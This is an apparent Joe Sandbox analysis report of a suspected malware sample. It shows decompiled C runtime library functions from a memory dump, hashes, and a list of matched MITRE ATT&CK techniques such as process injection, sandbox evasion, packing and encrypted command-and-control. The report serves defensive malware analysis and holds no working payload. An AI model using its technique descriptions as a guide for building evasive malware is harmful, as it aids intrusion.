0x00b53b3a
0x00000000
0x00b53ad7
0x00b53ad7
0x00b53ad9
0x00000000
0x00000000
0x00b53adc
0x00b53ae2
0x00b53ae4
0x00000000
0x00000000
0x00b53ae9
0x00b53aeb
0x00b53af0
0x00b53af3
0x00b53afd
0x00b53b00
0x00b53b0b
0x00b53b12
0x00b53b16
0x00b53b1b
0x00b53b1e
0x00b53b3d
0x00b53b3d
0x00000000
0x00b53b3d
0x00b53b06
0x00b53b06
0x00b53b08
0x00b53b08
0x00000000
0x00b53b08
0x00b53af9
0x00000000
0x00b53af9
0x00b53ad5
0x00b53a9f
0x00b53aa1
0x00000000
0x00000000
0x00b53aa9
0x00000000
0x00b53aa9
0x00b53b43
0x00b53b46
0x00b53b4b
0x00b53b4b
0x00b53b4d
0x00b53b52
0x00b53b52
0x00b5394c
0x00b5394f
0x00b53951
0x00000000
0x00000000
0x00b53957
0x00b53959
0x00b5395c
0x00b5395f
0x00b53964
0x00b5396c
0x00b5396e
0x00b53970
0x00b53972
0x00b53972
0x00b53977
0x00b53977
0x00b53978
0x00b5397b
0x00b5397b
0x00b53981
0x00000000
0x00000000
0x00b5398d
0x00b5398f
0x00b53992
0x00b53994
0x00b53a2e
0x00b53a35
0x00b53a35
0x00b53a3b
0x00b53a47
0x00b53a49
0x00000000
0x00000000
0x00b53a4b
0x00b53a51
0x00b53a54
0x00b53a57
0x00b53a5b
0x00b53a61
0x00b53a64
0x00b53a67
0x00b53a6a
0x00b53a6a
0x00b53a6f
0x00b53a70
0x00b53a73
0x00000000
0x00b53a73
0x00b5399a
0x00b539a0
0x00000000
0x00b539a0
0x00b539a3
0x00b539a5
0x00b539aa
0x00b539ab
0x00b539ae
0x00b539b1
0x00b539b1
0x00b539b3
0x00000000
0x00000000
0x00b539b9
0x00b539bb
0x00b539be
0x00b53a1b
0x00b53a1b
0x00b53a1c
0x00b53a22
0x00b53a23
0x00b53a26
0x00b53a29
0x00000000
0x00b53a29
0x00b539c0
0x00b539c2
0x00000000
0x00000000
0x00b539c4
0x00b539c6
0x00b539c8
0x00000000
0x00000000
0x00b539ca
0x00b539cc
0x00b539dc
0x00b539e9
0x00b539f0
0x00b539f5
0x00b539fc
0x00b53a06
0x00b53a0a
0x00b53a0f
0x00b53a12
0x00b53a12
0x00b53a12
0x00b53a15
0x00b53a18
0x00b53a18
0x00000000
0x00b53a18
0x00b539cf
0x00b539d5
0x00b539d8
0x00b539da
0x00000000
0x00000000
0x00000000
0x00b539da
0x00000000
0x00b539b1
0x00b538ea
0x00000000

APIs

__lock.LIBCMT ref: 00B538B6

Part of subcall function 00B5442F: __mtinitlocknum.LIBCMT ref: 00B54441
Part of subcall function 00B5442F: EnterCriticalSection.KERNEL32(00000000,?,00B537AB,0000000D), ref: 00B5445A

__calloc_crt.LIBCMT ref: 00B538C7

Part of subcall function 00B54869: __calloc_impl.LIBCMT ref: 00B54878

@_EH4_CallFilterFunc@8.LIBCMT ref: 00B538E2
GetStartupInfoW.KERNEL32(?,00B62260,00000064,00B51654,00B62190,00000014), ref: 00B5393B
__calloc_crt.LIBCMT ref: 00B53986
GetFileType.KERNEL32 ref: 00B539CF

Memory Dump Source

Source File: 00000005.00000002.972676491.0000000000B51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000005.00000002.972671079.0000000000B50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.972687897.0000000000B5E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.972694472.0000000000B63000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.972700094.0000000000B67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b50000_idcqz.jbxd

Similarity

API ID: __calloc_crt$CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__calloc_impl__lock__mtinitlocknum
String ID:
API String ID: 2772871689-0
Opcode ID: d6402149a5cc074d996e43fc5d6bcafdd986eff6fe9e94bf73c55c45bd5e47b4
Instruction ID: 85666d1cd3d5af5912f015226f0b979be600c8964c5d2bc88b89858143e3bfd1
Opcode Fuzzy Hash: d6402149a5cc074d996e43fc5d6bcafdd986eff6fe9e94bf73c55c45bd5e47b4
Instruction Fuzzy Hash: 1581E1719046458FCB14CF68C8817ADBBF0EF09761B2442EED8A6AB3D1C774DA46CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B53815 Relevance: 10.5, APIs: 7, Instructions: 45
threadCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00B53815(void* __ebx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E00B51890(_t3);
				if(E00B54560() != 0) {
					_t6 = E00B54001(E00B535A6);
					 *0xb6350c = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E00B54869(1, 0x3bc);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E00B5388B();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E00B5405D( *0xb6350c, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E00B53762(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E00B5388B();
					return 0;
				}
			}

0x00b53815
0x00b53821
0x00b53830
0x00b53835
0x00b5383b
0x00b5383e
0x00000000
0x00b53840
0x00b5384d
0x00b53851
0x00b53853
0x00b53882
0x00b53882
0x00b53887
0x00b5388a
0x00b53855
0x00b53863
0x00b53865
0x00000000
0x00b53867
0x00b53867
0x00b53869
0x00b5386a
0x00b53871
0x00b53877
0x00b5387b
0x00b5387f
0x00b53881
0x00b53881
0x00b53865
0x00b53853
0x00b53823
0x00b53823
0x00b53823
0x00b5382a
0x00b5382a

APIs

__init_pointers.LIBCMT ref: 00B53815

Part of subcall function 00B51890: RtlEncodePointer.NTDLL(00000000,?,00B5381A,00B5163A,00B62190,00000014), ref: 00B51893
Part of subcall function 00B51890: __initp_misc_winsig.LIBCMT ref: 00B518AE
Part of subcall function 00B51890: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00B54117
Part of subcall function 00B51890: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00B5412B
Part of subcall function 00B51890: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00B5413E
Part of subcall function 00B51890: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00B54151
Part of subcall function 00B51890: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00B54164
Part of subcall function 00B51890: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00B54177
Part of subcall function 00B51890: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00B5418A
Part of subcall function 00B51890: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00B5419D
Part of subcall function 00B51890: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00B541B0
Part of subcall function 00B51890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00B541C3
Part of subcall function 00B51890: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00B541D6
Part of subcall function 00B51890: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00B541E9
Part of subcall function 00B51890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00B541FC
Part of subcall function 00B51890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00B5420F
Part of subcall function 00B51890: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00B54222
Part of subcall function 00B51890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00B54235

__mtinitlocks.LIBCMT ref: 00B5381A
__mtterm.LIBCMT ref: 00B53823

Part of subcall function 00B5388B: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00B53828,00B5163A,00B62190,00000014), ref: 00B5447A
Part of subcall function 00B5388B: _free.LIBCMT ref: 00B54481
Part of subcall function 00B5388B: DeleteCriticalSection.KERNEL32(00B63558,?,?,00B53828,00B5163A,00B62190,00000014), ref: 00B544A3

__calloc_crt.LIBCMT ref: 00B53848
__initptd.LIBCMT ref: 00B5386A
GetCurrentThreadId.KERNEL32(00B5163A,00B62190,00000014), ref: 00B53871

Memory Dump Source

Source File: 00000005.00000002.972676491.0000000000B51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000005.00000002.972671079.0000000000B50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.972687897.0000000000B5E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.972694472.0000000000B63000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.972700094.0000000000B67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b50000_idcqz.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: 15e98c699610edf9cf344433740f712ffbf90b12a4c3715e48de52bf99d52db6
Instruction ID: 8ad26bf6f9295f4b79287b16bb74648a12381a73cb78de4d77a3b3fbba42fb29
Opcode Fuzzy Hash: 15e98c699610edf9cf344433740f712ffbf90b12a4c3715e48de52bf99d52db6
Instruction Fuzzy Hash: 7EF06D3251921159E26D77787C0274A2AC4CF01FB7B248AEEFC64DA2D2FF518A8A4690

Uniqueness

Uniqueness Score: -1.00%

Function 00B57452 Relevance: 7.6, APIs: 5, Instructions: 67
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E00B57452(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				void* _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				void* _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					if(_t31 != 0) {
						_push(__ebx);
						while(_t31 <= 0xffffffe0) {
							if(_t31 == 0) {
								_t31 = _t31 + 1;
							}
							_t7 = HeapReAlloc( *0xb64834, 0, _a4, _t31);
							_t20 = _t7;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								if( *0xb64830 == _t7) {
									_t9 = E00B51CC3();
									 *_t9 = E00B51CD6(GetLastError());
									goto L17;
								} else {
									if(E00B51741(_t7, _t31) == 0) {
										_t12 = E00B51CC3();
										 *_t12 = E00B51CD6(GetLastError());
										L12:
										_t8 = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E00B51741(_t6, _t31);
						 *((intOrPtr*)(E00B51CC3())) = 0xc;
						goto L12;
					} else {
						E00B54831(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E00B5114D(__ebx, __edx, __edi, _a8);
				}
			}

0x00b57459
0x00b57467
0x00b5746c
0x00b5747b
0x00b574ae
0x00b57480
0x00b57482
0x00b57482
0x00b5748f
0x00b57495
0x00b57499
0x00b574f9
0x00b574f9
0x00b5749b
0x00b574a1
0x00b574e3
0x00b574f7
0x00000000
0x00b574a3
0x00b574ac
0x00b574cb
0x00b574df
0x00b574c5
0x00b574c5
0x00000000
0x00000000
0x00000000
0x00b574ac
0x00b574a1
0x00000000
0x00b574c7
0x00b574b4
0x00b574bf
0x00000000
0x00b5746e
0x00b57471
0x00b57477
0x00b57477
0x00b574c8
0x00b574ca
0x00b5745b
0x00b57465
0x00b57465

APIs

_malloc.LIBCMT ref: 00B5745E

Part of subcall function 00B5114D: __FF_MSGBANNER.LIBCMT ref: 00B51164
Part of subcall function 00B5114D: __NMSG_WRITE.LIBCMT ref: 00B5116B
Part of subcall function 00B5114D: RtlAllocateHeap.NTDLL(00510000,00000000,00000001,00000000,00000000,00000000,?,00B548C7,00000000,00000000,00000000,00000000,?,00B544F9,00000018,00B62280), ref: 00B51190

_free.LIBCMT ref: 00B57471

Memory Dump Source

Source File: 00000005.00000002.972676491.0000000000B51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000005.00000002.972671079.0000000000B50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.972687897.0000000000B5E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.972694472.0000000000B63000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.972700094.0000000000B67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b50000_idcqz.jbxd

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 0340bebe6e1ae5faa1b28a18bb9a702f69a4ef677467ec9682ab799a5869e030
Instruction ID: 4d5955e40342943e030903fe786adc176c33de91cff1710f495c04ae67d37c94
Opcode Fuzzy Hash: 0340bebe6e1ae5faa1b28a18bb9a702f69a4ef677467ec9682ab799a5869e030
Instruction Fuzzy Hash: B1119431A896159ACB213F78BC49B593FD8EF04363B2049E5FD589B390DFB58948C690

Uniqueness

Uniqueness Score: -1.00%

Function 00B591C6 Relevance: 6.1, APIs: 4, Instructions: 97
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00B591C6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				signed int _v20;
				signed int _t35;
				int _t38;
				signed int _t41;
				int _t42;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				signed int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E00B54BFC( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E00B5917B( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t41 = _v20;
							_t59 = 1;
							_t28 = _t41 + 4; // 0x840ffff8
							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t42;
							if(_t42 != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E00B51CC3();
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							_t20 = _t59 + 0x74; // 0xe1c11fe1
							__eflags = _t50 -  *_t20;
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(_t62[1] == 0) {
								goto L20;
							}
							L18:
							_t22 = _t59 + 0x74; // 0xe1c11fe1
							_t59 =  *_t22;
							goto L21;
						}
						_t12 = _t59 + 0x74; // 0xe1c11fe1
						__eflags = _t50 -  *_t12;
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t17 = _t59 + 0x74; // 0xe1c11fe1
						_t18 = _t59 + 4; // 0x840ffff8
						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

0x00b591ce
0x00b591d3
0x00b591ed
0x00000000
0x00b591ed
0x00b591d5
0x00b591da
0x00000000
0x00000000
0x00b591df
0x00b591fc
0x00b59201
0x00b59204
0x00b5920b
0x00b5922a
0x00b59231
0x00b59233
0x00b59277
0x00b59283
0x00b59286
0x00b5928b
0x00b5928e
0x00b59294
0x00b59296
0x00b592a6
0x00b592a6
0x00b592aa
0x00b592ac
0x00b592af
0x00b592af
0x00b592af
0x00b592af
0x00000000
0x00b592b5
0x00b59298
0x00b59298
0x00b5929d
0x00b5929d
0x00b592a0
0x00000000
0x00b592a0
0x00b59235
0x00b59238
0x00b5923c
0x00b59265
0x00b59265
0x00b59265
0x00b59268
0x00b59268
0x00000000
0x00000000
0x00b5926a
0x00b5926e
0x00000000
0x00000000
0x00b59270
0x00b59270
0x00b59270
0x00000000
0x00b59270
0x00b5923e
0x00b5923e
0x00b59241
0x00000000
0x00000000
0x00b59245
0x00b5924f
0x00b59255
0x00b59258
0x00b5925e
0x00b59261
0x00b59263
0x00000000
0x00000000
0x00000000
0x00b59263
0x00b5920d
0x00b59210
0x00b59212
0x00b59217
0x00b59217
0x00b5921c
0x00000000
0x00b5921c
0x00b591e1
0x00b591e6
0x00b591ea
0x00b591ea
0x00000000

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00B591FC
__isleadbyte_l.LIBCMT ref: 00B5922A
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000), ref: 00B59258
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000), ref: 00B5928E

Memory Dump Source

Source File: 00000005.00000002.972676491.0000000000B51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000005.00000002.972671079.0000000000B50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.972687897.0000000000B5E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.972694472.0000000000B63000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.972700094.0000000000B67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b50000_idcqz.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: e49a24fb21e679e9ee0726865151c2eb1a93fb4431f6b1d6b145df228ab21979
Instruction ID: 5af9cba1289809d0ce770f57e49b203de4ccde6a590ff3f552d61bc299a8ffa8
Opcode Fuzzy Hash: e49a24fb21e679e9ee0726865151c2eb1a93fb4431f6b1d6b145df228ab21979
Instruction Fuzzy Hash: A331F03160025AFFDB218F65CC48BAA7BE5FF41352F1581E8EC24971A0D732D898DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B5A94D Relevance: 6.0, APIs: 4, Instructions: 48
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00B5A94D(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00B5AE9E(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00B5A9D3(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00B5B119(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00B5B058(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x00b5a950
0x00b5a956
0x00b5a9c9
0x00000000
0x00b5a95d
0x00b5a95d
0x00b5a960
0x00b5a97b
0x00b5a97e
0x00b5a99e
0x00b5a9b0
0x00b5a980
0x00b5a980
0x00b5a983
0x00000000
0x00b5a985
0x00b5a997
0x00b5a997
0x00b5a983
0x00b5a9ce
0x00b5a9d2
0x00b5a962
0x00b5a97a
0x00b5a97a
0x00b5a960

APIs

__cftof_l.LIBCMT ref: 00B5A971

Part of subcall function 00B5B058: __fltout2.LIBCMT ref: 00B5B081

__cftog_l.LIBCMT ref: 00B5A997
__cftoe_l.LIBCMT ref: 00B5A9C9

Memory Dump Source

Source File: 00000005.00000002.972676491.0000000000B51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000005.00000002.972671079.0000000000B50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.972687897.0000000000B5E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.972694472.0000000000B63000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.972700094.0000000000B67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b50000_idcqz.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: cdeb29173f8d62439b1330e9d8e6e1c7d4bd4930eabf05c874aab351d5694c28
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 60014E3604015EBBCF125E84CC51DEE3FA2BB18356B598695FE1968031D336C9B5AB82

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
